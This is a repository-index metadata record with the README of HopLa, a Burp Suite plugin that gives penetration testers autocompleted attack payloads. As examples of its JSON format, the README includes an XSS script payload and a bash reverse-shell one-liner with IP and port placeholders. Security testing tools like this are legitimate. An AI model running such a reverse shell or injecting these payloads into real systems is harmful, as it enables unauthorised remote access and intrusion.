{"id":13801588,"url":"https://github.com/synacktiv/HopLa","last_synced_at":"2025-05-13T11:31:25.581Z","repository":{"id":51090349,"uuid":"364879592","full_name":"synacktiv/HopLa","owner":"synacktiv","description":" HopLa Burp Suite Extender plugin - Adds autocompletion support and useful payloads in Burp Suite","archived":false,"fork":false,"pushed_at":"2021-05-12T16:24:50.000Z","size":279,"stargazers_count":712,"open_issues_count":4,"forks_count":79,"subscribers_count":13,"default_branch":"main","last_synced_at":"2024-11-18T16:57:37.983Z","etag":null,"topics":["burp","burp-extensions","burp-plugin","burp-suite","burp-ui"],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-3-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/synacktiv.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-05-06T11:01:23.000Z","updated_at":"2024-11-13T15:33:30.000Z","dependencies_parsed_at":"2022-09-04T04:01:28.748Z","dependency_job_id":null,"html_url":"https://github.com/synacktiv/HopLa","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/synacktiv%2FHopLa","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/synacktiv%2FHopLa/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/synacktiv%2FHopLa/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/synacktiv%2FHopLa/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/synacktiv","download_url":"https://codeload.github.com/synacktiv/HopLa/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":253932890,"owners_count":21986473,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["burp","burp-extensions","burp-plugin","burp-suite","burp-ui"],"created_at":"2024-08-04T00:01:24.702Z","updated_at":"2025-05-13T11:31:25.145Z","avatar_url":"https://github.com/synacktiv.png","language":"Java","readme":"# HopLa\n\nšŸ’„ All the power of PayloadsAllTheThings, without the overhead. \nThis extension adds autocompletion support and useful payloads in Burp Suite to make your intrusion easier.\n\nFeel free to improve with your payloads ! ā¤ļø\n\nDeveloped by Alexis Danizan [![Twitter Follow](https://img.shields.io/twitter/follow/alexisdanizan?style=social)](https://twitter.com/alexisdanizan/) \nReleased as open source by [Synacktiv šŸ„·](https://www.synacktiv.com/) \n\n\n![Demo GIF](img/demo.gif)\n\n## Getting started\n\n\n### Installation\n\n * Download the jar file from the release directory\n * Add it to Burp Suite using the Extender tab\n\n### Build\n\nExecute `gradle build` and you'll have the plugin ready in `releases/HopLa.jar`.\n\n## Usage\n\nBy default HopLa is shipped with default payloads. You can add yours by loading a custom JSON file in the the menu. \n\nAt the first usage HopLa creates a JSON file containing all the payloads in the jar file directory.\n\nPress `Ctrl+Q` to display the payload library menu.\n\nYou can disable the global autocompletion in the top menu.\n\nFor i3, add the following line to `$HOME/.config/i3/config` for floating frame:\n\n```\nfor_window [class=\".*burp-StartBurp.*\" title=\"^ $\"] floating enable\n```\n\n### How to add payloads\n\nThe JSON payloads file follow the structure:\n\n```json\n{\n \"categories\": [\n {\n \"name\": \"XSS\",\n \"values\": [\n {\n \"name\": \"Simple\",\n \"value\": \"\u003cscript\u003ealert(1)\u003c/script\u003e\"\n },\n {\n \"name\": \"Multiline\",\n \"value\": \"AAAA\\nBBBB\"\n },\n {\n \"name\" : \"Nested XSS menu\",\n \"values\": [\n {\n \"name\": \"Simple 2\",\n \"value\": \"\u003cscript\u003ealert(1)\u003c/script\u003e\"\n }\n ]\n }\n ]\n }\n ],\n \"keywords\": [\n {\n \"name\": \"Headers\",\n \"values\": [\n \"X-Forwarded-For\",\n \"X-Originally-Forwarded-For\",\n \"X-Originating-Ip\",\n \"X-Originating-IP\"\n ]\n }\n ]\n}\n```\nThere is no nesting limit.\n\nYou can automatically add a prompt dialog:\n```json\n{\n \"name\": \"Bash UDP\",\n \"value\": \"sh -i \u003e\u0026 /dev/udp/Ā§IPĀ§/Ā§PORTĀ§ 0\u003e\u00261\",\n \"prompt\": [\"IP\",\"PORT\"]\n},\n```\n\nTo add only keywords that do not appear in the menu, you can add them in the keywords category:\n\n```json\n{\n \"keywords\": [\n {\n \"name\": \"Headers\",\n \"values\": [\n \"X-Forwarded-For\",\n \"X-Originally-Forwarded-For\",\n \"X-Originating-Ip\",\n \"X-Originating-IP\"\n ]\n }\n ]\n}\n```\n\n## Roadmap\n\n* Support custom key binding for payload menu\n\n## Thanks To\n\n * https://github.com/Static-Flow/BurpSuiteAutoCompletion\n * https://github.com/d3vilbug/HackBar\n * https://github.com/swisskyrepo/PayloadsAllTheThings\n\nThanks a lot for your awesome work !\n\n## License\n\nReleased under BSD 3-Clause License see LICENSE for more information\n\nPlease feel free to report bugs, suggest features, or send pull requests.\n","funding_links":[],"categories":["Payload Generators and Fuzzers","šŸš€ AI Tools for Vim, Neovim, and Terminal","Java"],"sub_categories":["SSRF","Template Injection"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsynacktiv%2FHopLa","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsynacktiv%2FHopLa","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsynacktiv%2FHopLa/lists"}